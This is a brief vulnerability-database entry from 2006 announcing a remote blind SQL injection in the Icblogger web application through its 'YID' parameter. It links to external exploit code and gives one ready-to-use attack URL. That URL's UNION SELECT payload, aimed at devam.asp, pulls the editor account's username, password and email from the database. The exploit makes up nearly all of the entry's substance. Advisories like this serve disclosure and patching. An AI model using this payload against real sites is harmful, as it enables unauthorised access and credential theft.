Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14122
HistorySep 02, 2006 - 12:00 a.m.

Icblogger <= "YID" Remote Blind SQL Injection

2006-09-0200:00:00
vulners.com
21

Code :

http://www.brimstonemastiffs.com/icblogger.txt

Example :

http://www.exploitw0rld.com/devam.asp?YID=-1 UNION SELECT
null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM
editor WHERE editor_id = 1